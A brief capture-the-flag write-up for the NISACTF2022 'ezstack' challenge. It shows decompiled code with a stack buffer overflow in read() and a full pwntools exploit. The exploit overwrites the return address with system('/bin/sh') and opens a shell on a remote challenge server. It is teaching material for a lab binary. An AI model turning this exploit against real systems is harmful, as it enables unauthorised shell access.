[NISACTF2022]ezstack
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}-
shell
ssize_t shell()
{
char buf; // [esp+0h] [ebp-48h]
system("echo Welcome to NISACTF");
return read(0, &buf, 0x60u);
}shell函数处有溢出
完整exp
from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()